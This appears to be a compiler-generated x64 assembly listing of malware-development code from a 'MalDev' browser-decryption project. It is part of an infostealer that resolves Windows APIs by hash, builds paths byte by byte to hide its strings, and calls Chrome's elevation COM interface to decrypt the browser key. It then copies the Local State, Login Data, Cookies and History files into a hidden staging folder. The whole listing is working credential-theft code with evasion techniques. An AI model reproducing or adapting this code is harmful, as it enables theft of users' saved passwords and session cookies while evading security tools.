	mov	rax, QWORD PTR pWriteFile$41[rsp]
	mov	QWORD PTR tv370[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	lea	r9, QWORD PTR bytesWritten$14[rsp]
	mov	r8d, DWORD PTR bytesRead$6[rsp]
	lea	rdx, QWORD PTR buffer$45[rsp]
	mov	rcx, QWORD PTR hOut$22[rsp]
	call	QWORD PTR tv370[rsp]
	test	eax, eax
	jne	SHORT $LN29@CreateCopy
; Line 312
	jmp	SHORT $LN11@CreateCopy
$LN29@CreateCopy:
; Line 315
	mov	eax, DWORD PTR bytesRead$6[rsp]
	cmp	DWORD PTR bytesWritten$14[rsp], eax
	je	SHORT $LN30@CreateCopy
; Line 316
	jmp	SHORT $LN11@CreateCopy
$LN30@CreateCopy:
; Line 319
	mov	eax, DWORD PTR bytesRead$6[rsp]
	mov	rcx, QWORD PTR offset$17[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR offset$17[rsp], rax
; Line 320
	jmp	$LN10@CreateCopy
$LN11@CreateCopy:
; Line 322
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv378[rsp], rax
	mov	rcx, QWORD PTR hCopy$7[rsp]
	call	QWORD PTR tv378[rsp]
; Line 323
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv381[rsp], rax
	mov	rcx, QWORD PTR hOut$22[rsp]
	call	QWORD PTR tv381[rsp]
	npad	1
; Line 324
	jmp	SHORT $LN8@CreateCopy
; Line 325
	jmp	$LN7@CreateCopy
$LN8@CreateCopy:
; Line 326
	mov	rcx, QWORD PTR bufferProcessInfo$8[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
	npad	1
; Line 327
	jmp	$LN2@CreateCopy
$LN3@CreateCopy:
; Line 329
	mov	BYTE PTR $T4[rsp], 1
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T4[rsp]
$LN1@CreateCopy:
; Line 330
	add	rsp, 6000				; 00001770H
	pop	rdi
	ret	0
?CreateCopyFile@@YA_NPEAD0@Z ENDP			; CreateCopyFile
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 64
hr$ = 72
i$1 = 76
lpKernel32$ = 80
cookiesFilename$ = 88
historyFilename$ = 104
passwordFilename$ = 120
sMal$ = 136
network$ = 152
patternKey$ = 168
sOle32$ = 200
sUser32$ = 216
sShell32$ = 232
sOleAut32$ = 248
keyFileName$ = 264
sSubEdge$ = 280
sLocalState$ = 320
dwFileSize$ = 360
keyPointer$ = 368
ChromeCLSID$ = 376
sizeKeyB64$ = 392
length$ = 396
pElevator$ = 400
pLoadLibraryA$ = 408
ChromeIID2$ = 416
ChromeIID$ = 432
hOle32$ = 448
decryptedDataBSTR$ = 456
pCloseHandle$ = 464
fileBuf$ = 472
hFile$ = 480
hOleAut32$ = 488
tv1107 = 496
dwLastError$ = 500
pSHGetFolderPathA$ = 504
pCoCreateInstance$ = 512
bstrEncKey$ = 520
pCreateFileA$ = 528
pSysFreeString$ = 536
hFile$2 = 544
pCoSetProxyBlanket$ = 552
pGetFileSize$ = 560
pCoUninitialize$ = 568
pCoInitializeEx$ = 576
pReadFile$ = 584
pWriteFile$3 = 592
pSysStringByteLen$ = 600
pSysAllocStringByteLen$ = 608
hashSleep$4 = 616
hashCoUninitialize$ = 620
tv79 = 624
tv83 = 632
tv87 = 640
hShell32$ = 648
tv264 = 656
tv286 = 664
tv284 = 672
tv462 = 680
tv460 = 688
tv473 = 696
tv504 = 704
tv502 = 712
tv552 = 720
tv550 = 728
tv574 = 736
tv572 = 744
tv651 = 752
tv649 = 760
tv664 = 768
tv662 = 776
tv698 = 784
tv696 = 792
tv743 = 800
tv741 = 808
tv756 = 816
tv754 = 824
tv769 = 832
tv767 = 840
tv783 = 848
tv794 = 856
tv815 = 864
tv825 = 872
tv899 = 880
tv897 = 888
tv925 = 896
tv944 = 904
tv953 = 912
tv970 = 920
tv977 = 928
encKey$ = 936
tv1064 = 944
tv1073 = 952
tv1077 = 960
tv1093 = 968
tv1100 = 976
tv1105 = 984
hashKernel32$ = 992
tv1112 = 1000
pCopyFileA$5 = 1008
tv1138 = 1016
tv1142 = 1024
hashLoadLibraryA$ = 1032
hashSHGetFolderPathA$ = 1036
size$ = 1040
hashCreateFileA$ = 1044
hashGetFileSize$ = 1048
hashReadFile$ = 1052
hashCloseHandle$ = 1056
hashCoInitializeEx$ = 1060
hashCoCreateInstance$ = 1064
tv1109 = 1072
hashCoSetProxyBlanket$ = 1080
hashSysAllocStringByteLen$ = 1084
hashSysStringByteLen$ = 1088
hashSysFreeString$ = 1092
hashWriteFile$6 = 1096
hashCopyFileA$7 = 1100
hUser32$ = 1104
pSleep$8 = 1112
orCookiesPath$ = 1120
pathMal$ = 1392
pathEdge$ = 1664
path$ = 1936
keyPath$ = 2208
cookiesPath$ = 2480
historyPath$ = 2752
orHistoryPath$ = 3024
passwordPath$ = 3296
orPasswordPath$ = 3568
?DecryptKey@@YAXXZ PROC					; DecryptKey
; File C:\Users\ADMIN\Documents\GitHub\MalDev\BrowserDecryptData\KeyChromeExtractShell\Common.cpp
; Line 392
$LN40:
	push	rdi
	sub	rsp, 3840				; 00000f00H
; Line 393
	mov	DWORD PTR ChromeCLSID$[rsp], 1887985888	; 708860e0H
	mov	eax, 63041				; 0000f641H
	mov	WORD PTR ChromeCLSID$[rsp+4], ax
	mov	eax, 17937				; 00004611H
	mov	WORD PTR ChromeCLSID$[rsp+6], ax
	mov	BYTE PTR ChromeCLSID$[rsp+8], 136	; 00000088H
	mov	BYTE PTR ChromeCLSID$[rsp+9], 149	; 00000095H
	mov	BYTE PTR ChromeCLSID$[rsp+10], 125	; 0000007dH
	mov	BYTE PTR ChromeCLSID$[rsp+11], 134	; 00000086H
	mov	BYTE PTR ChromeCLSID$[rsp+12], 125	; 0000007dH
	mov	BYTE PTR ChromeCLSID$[rsp+13], 211	; 000000d3H
	mov	BYTE PTR ChromeCLSID$[rsp+14], 103	; 00000067H
	mov	BYTE PTR ChromeCLSID$[rsp+15], 91	; 0000005bH
; Line 394
	mov	DWORD PTR ChromeIID$[rsp], 1178255055	; 463abecfH
	mov	eax, 16653				; 0000410dH
	mov	WORD PTR ChromeIID$[rsp+4], ax
	mov	eax, 16511				; 0000407fH
	mov	WORD PTR ChromeIID$[rsp+6], ax
	mov	BYTE PTR ChromeIID$[rsp+8], 138		; 0000008aH
	mov	BYTE PTR ChromeIID$[rsp+9], 245		; 000000f5H
	mov	BYTE PTR ChromeIID$[rsp+10], 13
	mov	BYTE PTR ChromeIID$[rsp+11], 243	; 000000f3H
	mov	BYTE PTR ChromeIID$[rsp+12], 90		; 0000005aH
	mov	BYTE PTR ChromeIID$[rsp+13], 0
	mov	BYTE PTR ChromeIID$[rsp+14], 92		; 0000005cH
	mov	BYTE PTR ChromeIID$[rsp+15], 200	; 000000c8H
; Line 395
	mov	DWORD PTR ChromeIID2$[rsp], 469049483	; 1bf5208bH
	mov	eax, 10591				; 0000295fH
	mov	WORD PTR ChromeIID2$[rsp+4], ax
	mov	eax, 18834				; 00004992H
	mov	WORD PTR ChromeIID2$[rsp+6], ax
	mov	BYTE PTR ChromeIID2$[rsp+8], 181	; 000000b5H
	mov	BYTE PTR ChromeIID2$[rsp+9], 244	; 000000f4H
	mov	BYTE PTR ChromeIID2$[rsp+10], 58	; 0000003aH
	mov	BYTE PTR ChromeIID2$[rsp+11], 155	; 0000009bH
	mov	BYTE PTR ChromeIID2$[rsp+12], 182	; 000000b6H
	mov	BYTE PTR ChromeIID2$[rsp+13], 73	; 00000049H
	mov	BYTE PTR ChromeIID2$[rsp+14], 72	; 00000048H
	mov	BYTE PTR ChromeIID2$[rsp+15], 56	; 00000038H
; Line 397
	mov	QWORD PTR pElevator$[rsp], 0
; Line 400
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 401
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 402
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 403
	cmp	QWORD PTR lpKernel32$[rsp], 0
	jne	SHORT $LN5@DecryptKey
; Line 404
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN5@DecryptKey:
; Line 408
	mov	DWORD PTR hashLoadLibraryA$[rsp], -462133483 ; e4746715H
; Line 409
	mov	r8d, -462133483				; e4746715H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pLoadLibraryA$[rsp], rax
; Line 410
	cmp	QWORD PTR pLoadLibraryA$[rsp], 0
	jne	SHORT $LN6@DecryptKey
; Line 411
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN6@DecryptKey:
; Line 414
	mov	BYTE PTR sOle32$[rsp], 79		; 0000004fH
	mov	BYTE PTR sOle32$[rsp+1], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sOle32$[rsp+3], 51		; 00000033H
	mov	BYTE PTR sOle32$[rsp+4], 50		; 00000032H
	mov	BYTE PTR sOle32$[rsp+5], 46		; 0000002eH
	mov	BYTE PTR sOle32$[rsp+6], 100		; 00000064H
	mov	BYTE PTR sOle32$[rsp+7], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+8], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+9], 0
; Line 415
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv79[rsp], rax
	lea	rcx, QWORD PTR sOle32$[rsp]
	call	QWORD PTR tv79[rsp]
	mov	QWORD PTR hOle32$[rsp], rax
; Line 417
	mov	BYTE PTR sUser32$[rsp], 117		; 00000075H
	mov	BYTE PTR sUser32$[rsp+1], 115		; 00000073H
	mov	BYTE PTR sUser32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sUser32$[rsp+3], 114		; 00000072H
	mov	BYTE PTR sUser32$[rsp+4], 51		; 00000033H
	mov	BYTE PTR sUser32$[rsp+5], 50		; 00000032H
	mov	BYTE PTR sUser32$[rsp+6], 46		; 0000002eH
	mov	BYTE PTR sUser32$[rsp+7], 100		; 00000064H
	mov	BYTE PTR sUser32$[rsp+8], 108		; 0000006cH
	mov	BYTE PTR sUser32$[rsp+9], 108		; 0000006cH
	mov	BYTE PTR sUser32$[rsp+10], 0
; Line 418
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv83[rsp], rax
	lea	rcx, QWORD PTR sUser32$[rsp]
	call	QWORD PTR tv83[rsp]
	mov	QWORD PTR hUser32$[rsp], rax
; Line 420
	mov	BYTE PTR sShell32$[rsp], 83		; 00000053H
	mov	BYTE PTR sShell32$[rsp+1], 104		; 00000068H
	mov	BYTE PTR sShell32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sShell32$[rsp+3], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+4], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+5], 51		; 00000033H
	mov	BYTE PTR sShell32$[rsp+6], 50		; 00000032H
	mov	BYTE PTR sShell32$[rsp+7], 46		; 0000002eH
	mov	BYTE PTR sShell32$[rsp+8], 100		; 00000064H
	mov	BYTE PTR sShell32$[rsp+9], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+10], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+11], 0
; Line 421
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv87[rsp], rax
	lea	rcx, QWORD PTR sShell32$[rsp]
	call	QWORD PTR tv87[rsp]
	mov	QWORD PTR hShell32$[rsp], rax
; Line 429
	mov	DWORD PTR hashSHGetFolderPathA$[rsp], -1368526292 ; ae6df22cH
; Line 430
	mov	r8d, -1368526292			; ae6df22cH
	mov	rdx, QWORD PTR hShell32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSHGetFolderPathA$[rsp], rax
; Line 431
	cmp	QWORD PTR pSHGetFolderPathA$[rsp], 0
	jne	SHORT $LN7@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN7@DecryptKey:
; Line 432
	lea	rax, QWORD PTR path$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 433
	mov	rax, QWORD PTR pSHGetFolderPathA$[rsp]
	mov	QWORD PTR tv264[rsp], rax
	lea	rax, QWORD PTR path$[rsp]
	mov	QWORD PTR [rsp+32], rax
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 28
	xor	ecx, ecx
	call	QWORD PTR tv264[rsp]
	test	eax, eax
	je	SHORT $LN8@DecryptKey
; Line 434
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN8@DecryptKey:
; Line 437
	lea	rax, QWORD PTR pathEdge$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 438
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR pathEdge$[rsp]
	lea	rcx, QWORD PTR path$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 447
	mov	BYTE PTR sSubEdge$[rsp], 92		; 0000005cH
	mov	BYTE PTR sSubEdge$[rsp+1], 71		; 00000047H
	mov	BYTE PTR sSubEdge$[rsp+2], 111		; 0000006fH
	mov	BYTE PTR sSubEdge$[rsp+3], 111		; 0000006fH
	mov	BYTE PTR sSubEdge$[rsp+4], 103		; 00000067H
	mov	BYTE PTR sSubEdge$[rsp+5], 108		; 0000006cH
	mov	BYTE PTR sSubEdge$[rsp+6], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+7], 92		; 0000005cH
; Line 448
	mov	BYTE PTR sSubEdge$[rsp+8], 67		; 00000043H
	mov	BYTE PTR sSubEdge$[rsp+9], 104		; 00000068H
	mov	BYTE PTR sSubEdge$[rsp+10], 114		; 00000072H
	mov	BYTE PTR sSubEdge$[rsp+11], 111		; 0000006fH
	mov	BYTE PTR sSubEdge$[rsp+12], 109		; 0000006dH
	mov	BYTE PTR sSubEdge$[rsp+13], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+14], 92		; 0000005cH
; Line 449
	mov	BYTE PTR sSubEdge$[rsp+15], 85		; 00000055H
	mov	BYTE PTR sSubEdge$[rsp+16], 115		; 00000073H
	mov	BYTE PTR sSubEdge$[rsp+17], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+18], 114		; 00000072H
	mov	BYTE PTR sSubEdge$[rsp+19], 32		; 00000020H
	mov	BYTE PTR sSubEdge$[rsp+20], 68		; 00000044H
	mov	BYTE PTR sSubEdge$[rsp+21], 97		; 00000061H
	mov	BYTE PTR sSubEdge$[rsp+22], 116		; 00000074H
	mov	BYTE PTR sSubEdge$[rsp+23], 97		; 00000061H
	mov	BYTE PTR sSubEdge$[rsp+24], 92		; 0000005cH
; Line 450
	mov	BYTE PTR sSubEdge$[rsp+25], 80		; 00000050H
	mov	BYTE PTR sSubEdge$[rsp+26], 114		; 00000072H
	mov	BYTE PTR sSubEdge$[rsp+27], 111		; 0000006fH
	mov	BYTE PTR sSubEdge$[rsp+28], 102		; 00000066H
	mov	BYTE PTR sSubEdge$[rsp+29], 105		; 00000069H
	mov	BYTE PTR sSubEdge$[rsp+30], 108		; 0000006cH
	mov	BYTE PTR sSubEdge$[rsp+31], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+32], 32		; 00000020H
	mov	BYTE PTR sSubEdge$[rsp+33], 49		; 00000031H
; Line 451
	mov	BYTE PTR sSubEdge$[rsp+34], 0
; Line 453
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv286[rsp], rax
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR pathEdge$[rsp+rax]
	mov	QWORD PTR tv284[rsp], rax
	mov	r8, QWORD PTR tv286[rsp]
	mov	rdx, QWORD PTR tv284[rsp]
	lea	rcx, QWORD PTR sSubEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 456
	mov	BYTE PTR sLocalState$[rsp], 92		; 0000005cH
	mov	BYTE PTR sLocalState$[rsp+1], 71	; 00000047H
	mov	BYTE PTR sLocalState$[rsp+2], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+3], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+4], 103	; 00000067H
	mov	BYTE PTR sLocalState$[rsp+5], 108	; 0000006cH
	mov	BYTE PTR sLocalState$[rsp+6], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+7], 92	; 0000005cH
; Line 457
	mov	BYTE PTR sLocalState$[rsp+8], 67	; 00000043H
	mov	BYTE PTR sLocalState$[rsp+9], 104	; 00000068H
	mov	BYTE PTR sLocalState$[rsp+10], 114	; 00000072H
	mov	BYTE PTR sLocalState$[rsp+11], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+12], 109	; 0000006dH
	mov	BYTE PTR sLocalState$[rsp+13], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+14], 92	; 0000005cH
; Line 458
	mov	BYTE PTR sLocalState$[rsp+15], 85	; 00000055H
	mov	BYTE PTR sLocalState$[rsp+16], 115	; 00000073H
	mov	BYTE PTR sLocalState$[rsp+17], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+18], 114	; 00000072H
	mov	BYTE PTR sLocalState$[rsp+19], 32	; 00000020H
	mov	BYTE PTR sLocalState$[rsp+20], 68	; 00000044H
	mov	BYTE PTR sLocalState$[rsp+21], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+22], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+23], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+24], 92	; 0000005cH
; Line 459
	mov	BYTE PTR sLocalState$[rsp+25], 76	; 0000004cH
	mov	BYTE PTR sLocalState$[rsp+26], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+27], 99	; 00000063H
	mov	BYTE PTR sLocalState$[rsp+28], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+29], 108	; 0000006cH
	mov	BYTE PTR sLocalState$[rsp+30], 32	; 00000020H
	mov	BYTE PTR sLocalState$[rsp+31], 83	; 00000053H
	mov	BYTE PTR sLocalState$[rsp+32], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+33], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+34], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+35], 101	; 00000065H
; Line 460
	mov	BYTE PTR sLocalState$[rsp+36], 0
; Line 462
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	DWORD PTR size$[rsp], eax
; Line 463
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv462[rsp], rax
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR path$[rsp+rax]
	mov	QWORD PTR tv460[rsp], rax
	mov	r8, QWORD PTR tv462[rsp]
	mov	rdx, QWORD PTR tv460[rsp]
	lea	rcx, QWORD PTR sLocalState$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 465
	lea	rax, QWORD PTR pathMal$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 466
	mov	rax, QWORD PTR pSHGetFolderPathA$[rsp]
	mov	QWORD PTR tv473[rsp], rax
	lea	rax, QWORD PTR pathMal$[rsp]
	mov	QWORD PTR [rsp+32], rax
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 26
	xor	ecx, ecx
	call	QWORD PTR tv473[rsp]
	test	eax, eax
	je	SHORT $LN9@DecryptKey
; Line 467
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN9@DecryptKey:
; Line 470
	mov	BYTE PTR sMal$[rsp], 92			; 0000005cH
	mov	BYTE PTR sMal$[rsp+1], 76		; 0000004cH
	mov	BYTE PTR sMal$[rsp+2], 77		; 0000004dH
	mov	BYTE PTR sMal$[rsp+3], 73		; 00000049H
	mov	BYTE PTR sMal$[rsp+4], 71		; 00000047H
	mov	BYTE PTR sMal$[rsp+5], 117		; 00000075H
	mov	BYTE PTR sMal$[rsp+6], 97		; 00000061H
	mov	BYTE PTR sMal$[rsp+7], 114		; 00000072H
	mov	BYTE PTR sMal$[rsp+8], 100		; 00000064H
	mov	BYTE PTR sMal$[rsp+9], 105		; 00000069H
	mov	BYTE PTR sMal$[rsp+10], 97		; 00000061H
	mov	BYTE PTR sMal$[rsp+11], 110		; 0000006eH
	mov	BYTE PTR sMal$[rsp+12], 0
; Line 473
	lea	rax, QWORD PTR keyPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 474
	lea	rax, QWORD PTR cookiesPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 475
	lea	rax, QWORD PTR historyPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 476
	lea	rax, QWORD PTR passwordPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 478
	lea	rcx, QWORD PTR sMal$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv504[rsp], rax
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR pathMal$[rsp+rax]
	mov	QWORD PTR tv502[rsp], rax
	mov	r8, QWORD PTR tv504[rsp]
	mov	rdx, QWORD PTR tv502[rsp]
	lea	rcx, QWORD PTR sMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 480
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR keyPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 481
	mov	BYTE PTR keyFileName$[rsp], 92		; 0000005cH
	mov	BYTE PTR keyFileName$[rsp+1], 98	; 00000062H
	mov	BYTE PTR keyFileName$[rsp+2], 114	; 00000072H
	mov	BYTE PTR keyFileName$[rsp+3], 111	; 0000006fH
	mov	BYTE PTR keyFileName$[rsp+4], 119	; 00000077H
	mov	BYTE PTR keyFileName$[rsp+5], 115	; 00000073H
	mov	BYTE PTR keyFileName$[rsp+6], 101	; 00000065H
	mov	BYTE PTR keyFileName$[rsp+7], 114	; 00000072H
	mov	BYTE PTR keyFileName$[rsp+8], 107	; 0000006bH
	mov	BYTE PTR keyFileName$[rsp+9], 101	; 00000065H
	mov	BYTE PTR keyFileName$[rsp+10], 121	; 00000079H
	mov	BYTE PTR keyFileName$[rsp+11], 46	; 0000002eH
	mov	BYTE PTR keyFileName$[rsp+12], 100	; 00000064H
	mov	BYTE PTR keyFileName$[rsp+13], 98	; 00000062H
	mov	BYTE PTR keyFileName$[rsp+14], 0
; Line 482
	lea	rcx, QWORD PTR keyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv552[rsp], rax
	lea	rcx, QWORD PTR keyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR keyPath$[rsp+rax]
	mov	QWORD PTR tv550[rsp], rax
	mov	r8, QWORD PTR tv552[rsp]
	mov	rdx, QWORD PTR tv550[rsp]
	lea	rcx, QWORD PTR keyFileName$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 484
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR cookiesPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 485
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR historyPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 486
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR passwordPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 487
	mov	BYTE PTR historyFilename$[rsp], 92	; 0000005cH
	mov	BYTE PTR historyFilename$[rsp+1], 72	; 00000048H
	mov	BYTE PTR historyFilename$[rsp+2], 105	; 00000069H
	mov	BYTE PTR historyFilename$[rsp+3], 115	; 00000073H
	mov	BYTE PTR historyFilename$[rsp+4], 116	; 00000074H
	mov	BYTE PTR historyFilename$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR historyFilename$[rsp+6], 114	; 00000072H
	mov	BYTE PTR historyFilename$[rsp+7], 121	; 00000079H
	mov	BYTE PTR historyFilename$[rsp+8], 0
; Line 488
	mov	BYTE PTR cookiesFilename$[rsp], 92	; 0000005cH
	mov	BYTE PTR cookiesFilename$[rsp+1], 67	; 00000043H
	mov	BYTE PTR cookiesFilename$[rsp+2], 111	; 0000006fH
	mov	BYTE PTR cookiesFilename$[rsp+3], 111	; 0000006fH
	mov	BYTE PTR cookiesFilename$[rsp+4], 107	; 0000006bH
	mov	BYTE PTR cookiesFilename$[rsp+5], 105	; 00000069H
	mov	BYTE PTR cookiesFilename$[rsp+6], 101	; 00000065H
	mov	BYTE PTR cookiesFilename$[rsp+7], 115	; 00000073H
	mov	BYTE PTR cookiesFilename$[rsp+8], 0
; Line 489
	mov	BYTE PTR passwordFilename$[rsp], 92	; 0000005cH
	mov	BYTE PTR passwordFilename$[rsp+1], 76	; 0000004cH
	mov	BYTE PTR passwordFilename$[rsp+2], 111	; 0000006fH
	mov	BYTE PTR passwordFilename$[rsp+3], 103	; 00000067H
	mov	BYTE PTR passwordFilename$[rsp+4], 105	; 00000069H
	mov	BYTE PTR passwordFilename$[rsp+5], 110	; 0000006eH
	mov	BYTE PTR passwordFilename$[rsp+6], 32	; 00000020H
	mov	BYTE PTR passwordFilename$[rsp+7], 68	; 00000044H
	mov	BYTE PTR passwordFilename$[rsp+8], 97	; 00000061H
	mov	BYTE PTR passwordFilename$[rsp+9], 116	; 00000074H
	mov	BYTE PTR passwordFilename$[rsp+10], 97	; 00000061H
	mov	BYTE PTR passwordFilename$[rsp+11], 0
; Line 491
	lea	rcx, QWORD PTR cookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv574[rsp], rax
	lea	rcx, QWORD PTR cookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR cookiesPath$[rsp+rax]
	mov	QWORD PTR tv572[rsp], rax
	mov	r8, QWORD PTR tv574[rsp]
	mov	rdx, QWORD PTR tv572[rsp]
	lea	rcx, QWORD PTR cookiesFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 492
	lea	rcx, QWORD PTR historyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv651[rsp], rax
	lea	rcx, QWORD PTR historyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR historyPath$[rsp+rax]
	mov	QWORD PTR tv649[rsp], rax
	mov	r8, QWORD PTR tv651[rsp]
	mov	rdx, QWORD PTR tv649[rsp]
	lea	rcx, QWORD PTR historyFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
